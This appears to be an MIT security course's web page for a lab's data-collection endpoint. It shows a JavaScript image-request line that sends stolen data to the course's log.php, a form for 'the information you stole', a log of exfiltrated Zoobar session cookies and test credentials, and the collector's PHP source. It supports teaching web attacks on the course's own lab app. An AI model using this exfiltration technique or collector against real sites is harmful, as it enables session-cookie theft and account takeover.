Lab 4 Logging Script

You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


(some identifier to locate your payload in the log)


(the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Mon, 03 Jun 2024 12:17:10 -0400: Iluvata8: grader/TBEBJKEESRGR
Mon, 03 Jun 2024 12:16:38 -0400: Iluvata5: PyZoobarLogin=grader#422f1b0471041b0b67eb640b9cd20654ce171298c2e0e8cab2e2b8e9e9cad71e
Mon, 03 Jun 2024 12:16:30 -0400: Iluvata4: PyZoobarLogin=grader#091f680c1b49e64c92f6008ed9bc4262dd23d1c30ca0ce1cd2d339f3a2827a84
Mon, 03 Jun 2024 12:16:15 -0400: Iluvata2: PyZoobarLogin=grader#bd538664767dcda10343af9ae21e7462ec8f2831b8ec2241cce563b98fd40f68
Wed, 29 May 2024 12:18:52 -0400: Iluvata-chal: grader/IADILURVUXTK
Wed, 29 May 2024 12:18:40 -0400: Iluvata8: grader/UHRIVBCJYFUT
Wed, 29 May 2024 12:18:32 -0400: Iluvata8: grader/FIMHWDQVSDPE
Wed, 29 May 2024 12:18:06 -0400: Iluvata5: PyZoobarLogin=grader#eed9a5e52395413ab2c305a39b711e784a1da9f418f26ae9ce8cea221065eaf1
Wed, 29 May 2024 12:17:59 -0400: Iluvata4: PyZoobarLogin=grader#b13b7fdf2b4df70fb3f8db3a96bc59bbf6a4d7a2270d33d35cf543fb4ac90080
Wed, 29 May 2024 12:17:44 -0400: Iluvata2: PyZoobarLogin=grader#dc9811be7d6db75947660c19ebb0d5d742ad9c217a117da8758c62c86db7431b
Wed, 29 May 2024 12:12:39 -0400: Iluvata8: 234ssed/fs3w2a
Wed, 29 May 2024 12:11:48 -0400: Iluvata8: 2343/23423
Wed, 29 May 2024 12:11:30 -0400: Iluvata8: 2343/23423
Wed, 29 May 2024 12:11:08 -0400: Iluvata8: 2343/23423
Wed, 29 May 2024 12:07:26 -0400: Iluvata8: se/fee
Wed, 29 May 2024 11:21:16 -0400: Iluvata8: jyc/123
Wed, 29 May 2024 11:20:46 -0400: Iluvata9: jyc/123
Wed, 29 May 2024 11:19:57 -0400: Iluvata9: jyc/234
Wed, 29 May 2024 11:19:08 -0400: Iluvata9: zmy/123
Tue, 28 May 2024 16:22:38 -0400: Iluvata9: fese/fee
Tue, 28 May 2024 16:22:21 -0400: Iluvata9: fese/fwex
Tue, 28 May 2024 16:20:02 -0400: Iluvata-chal: qeeee/12322
Tue, 28 May 2024 16:16:16 -0400: Iluvata9: jyc/2342
Tue, 28 May 2024 16:15:56 -0400: Iluvata9: jyc/123
Tue, 28 May 2024 16:09:35 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 16:08:16 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 16:06:35 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 16:02:56 -0400: Iluvata-chal: grader/DCAOPJLXPIFA
Tue, 28 May 2024 16:02:45 -0400: Iluvata8: grader/RJQXDFVVCSUL
Tue, 28 May 2024 16:02:38 -0400: Iluvata8: grader/XBJSLVBNWKYF
Tue, 28 May 2024 16:02:13 -0400: Iluvata5: PyZoobarLogin=grader#00c384aa1df2d5833c3a6ccb3ad82fc5f544353d4eba8cc385d1696cc768998c
Tue, 28 May 2024 16:02:05 -0400: Iluvata4: PyZoobarLogin=grader#c68f6ffd9dff92615c568b828c0949985826363b242b1e20fc6b65a3e0626f2a
Tue, 28 May 2024 16:01:53 -0400: Iluvata2: PyZoobarLogin=grader#5b7e282a23e1069ba828527d46ee1705d5a42463228b441cf398095f248a70b5
Tue, 28 May 2024 15:59:33 -0400: Iluvata-chal: were/eeee
Tue, 28 May 2024 15:08:27 -0400: Iluvata8: qwer/qwer
Tue, 28 May 2024 14:55:15 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 14:49:37 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 14:49:17 -0400: Iluvata8: jyc/1234
Tue, 28 May 2024 14:48:39 -0400: Iluvata8: jyc3/123456
Tue, 28 May 2024 14:47:59 -0400: Iluvata8: jyc2/12345
Tue, 28 May 2024 14:47:05 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:42 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:33 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:10 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:02 -0400: Iluvata8: jyc1/1231
Tue, 28 May 2024 14:41:55 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 14:21:21 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 13:51:28 -0400: Iluvata5: PyZoobarLogin=grader#8366a7af80f923d8f3d5f9252eb28cab15fac8127be71c0a9f939f8a6c4c285c
Tue, 28 May 2024 13:51:19 -0400: Iluvata4: PyZoobarLogin=grader#fed3e69c877d94d5387e812616ceead4ade5dc300b22f7b207310ffe8e5e6765
Tue, 28 May 2024 13:50:57 -0400: Iluvata2: PyZoobarLogin=grader#f5741ef6353eb11d53ed0082a0b33b6724c2990f76187d2f1d1f7741393b981d
Tue, 28 May 2024 13:45:27 -0400: Iluvata5: PyZoobarLogin=grader#d3ba86aa23481cec65fea93153321aeb38565a4b64fea3770f24020ba10d9572
Tue, 28 May 2024 13:45:21 -0400: Iluvata4: PyZoobarLogin=grader#b7fc469d82d210a1f0fd45422a9a78b4bfd4b48364d58d701d97cfa4ad6c96b2
Tue, 28 May 2024 13:45:07 -0400: Iluvata2: PyZoobarLogin=grader#fb96bd67529b7b7df4030ca990726513cf5c296cea67a2372047830b6746cc22
Tue, 28 May 2024 13:15:59 -0400: Iluvata5: PyZoobarLogin=grader#3a4dec551597e6cc80e58fe788bf2db3b5b3f03663d2ef9a81ba0f1a545d95bc
Tue, 28 May 2024 13:15:51 -0400: Iluvata4: PyZoobarLogin=grader#6b80be4d1016f602fa42002ed95da94348030edc25a7c192d549754cacc20c45
Tue, 28 May 2024 13:15:34 -0400: Iluvata2: PyZoobarLogin=grader#2b7ea105a1aa5016b5442d8f46dc814484c56457d94d95b8d44d9ef01f8d9881
Tue, 28 May 2024 08:34:41 -0400: Iluvata5: PyZoobarLogin=grader#bb9362fcb516db3da8c27e9fe2e842a5e08f13eb6d00a6330e22857866c82360
Tue, 28 May 2024 08:34:35 -0400: Iluvata4: PyZoobarLogin=grader#2369696d1c21a11e57abdc0ad221f9a65a2e72586fa0d409b61dd78a06b4da2a
Tue, 28 May 2024 08:34:20 -0400: Iluvata2: PyZoobarLogin=grader#6bcf2890b797a535b5014ffb4244d2890ceee38b737fef13b605cf92a10a62c1
Tue, 28 May 2024 08:30:03 -0400: Iluvata5: PyZoobarLogin=grader#450692ff9e7f9a6c4f22c2b91f3fbf048885a39dde100512a62cac3665581dfb
Tue, 28 May 2024 08:29:55 -0400: Iluvata4: PyZoobarLogin=grader#8061568cd245666e7bcf65dbdd8f676f5b894f7bce111ff095e6ad8f0eb9e2b4
Tue, 28 May 2024 08:29:41 -0400: Iluvata2: PyZoobarLogin=grader#7ea95dd55ae0d1770bccf43bd58fe6ec91eac3e229a33aaa08e3022996725f29
Tue, 28 May 2024 08:24:39 -0400: Iluvata5: PyZoobarLogin=grader#7562b8b1c0718fef68192ae46e3be90799cdabe2bb6d4a01fcc3f009c34c575d
Tue, 28 May 2024 08:24:32 -0400: Iluvata4: PyZoobarLogin=grader#0f23ced70e9aa9c09aeea6937e2ffbbcde81b22ee615515b780ba15b8ae70003
Tue, 28 May 2024 08:24:17 -0400: Iluvata2: PyZoobarLogin=grader#97d3bf7b01cec5fdd33e431c6b3275a3ad0074902af820617cc112e20228f103
Tue, 28 May 2024 08:22:34 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:22:27 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:22:20 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:21:09 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:21:03 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:20:56 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:57 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:39 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:31 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:05 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:10:45 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:10:03 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:09:41 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:06:13 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:02:05 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:01:38 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 07:59:07 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 07:56:56 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Mon, 27 May 2024 14:35:52 -0400: Iluvata: PyZoobarLogin=grader#f7754a74aa93e7f5594297087967f2e482bc2943b8cb5b818894c88672893dc4
Mon, 27 May 2024 14:34:10 -0400: Iluvata: PyZoobarLogin=jyc#40647e25aba3751620f07b7ef51023bbb17bd2cbce51a3fbccca9b944d5a6fdd
Mon, 27 May 2024 14:32:08 -0400: Iluvata: PyZoobarLogin=jyc
Mon, 27 May 2024 14:27:56 -0400: Iluvata: some-stringaaa
Mon, 27 May 2024 14:22:26 -0400: my-username: some-string
Mon, 27 May 2024 14:17:53 -0400: my-username: some-string
Mon, 27 May 2024 14:17:40 -0400: Iluvata: some-string
Mon, 27 May 2024 14:15:37 -0400: my-username: some-string

Source code

In case you are curious, here is the source code of this page.


<?php
header
("Access-Control-Allow-Origin: *");

do {
    if (!
array_key_exists("id"$_REQUEST)) {
        break;
    }

    
$id $_REQUEST['id'];
    if (
strlen($id) > 1000) {
        
header("HTTP/1.0 413 Payload Too Large");
        echo 
"ID value is larger than 1000 bytes";
        return;
    }

    if (!
array_key_exists("payload"$_REQUEST)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"No payload given";
        return;
    }

    
$payload $_REQUEST['payload'];
    if (empty(
$payload)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"Empty payload given";
        return;
    }

    if (
strlen($payload) > 1000) {
        
header("HTTP/1.0 413 Payload Too Large");
        echo 
"Payload is larger than 1000 bytes";
        return;
    }

    if (!
function_exists('apcu_add')) {
        
header("HTTP/1.0 501 Not Implemented");
        echo 
"APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (
apcu_add($payloadtrue5) === false) {
        
// exact same $payload was sent in the past 5 seconds
        
header("HTTP/1.0 429 Too Many Requests");
        echo 
"That exact payload was sent very recently; rejecting";
        return;
    }

    
$payload str_replace(array("\n""\r"), '.'$payload);
    
$id str_replace(array("\n""\r"), '.'$id);

    
$file fopen("/tmp/6.5660-2023-logger.txt""c+");
    if (
$file === false) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to open log file";
        return;
    }

    if (!
flock($fileLOCK_EX)) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to lock log file";
        return;
    }

    
$lines = array();
    while (!
feof($file) && count($lines) < 100) {
        
$lines[] = fgets($file);
    }
    
ftruncate($file0);
    
rewind($file);
    
fwrite($filedate(DATE_RFC2822) . ": " $id ": " $payload "\n");
    foreach (
$lines as &$line) {
        
fwrite($file$line);
    }

    
flock($fileLOCK_UN);
    
fclose($file);

    echo 
"Logged!";
    return;
} while(
0);

$link "(new Image()).src="
      
"'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'"
      
" + 'id=my-username'"
      
" + '&payload=some-string' + '&random='"
      
" + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines 
file_get_contents("/tmp/6.5660-2023-logger.txt");
        echo 
htmlspecialchars($lines);
    
?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>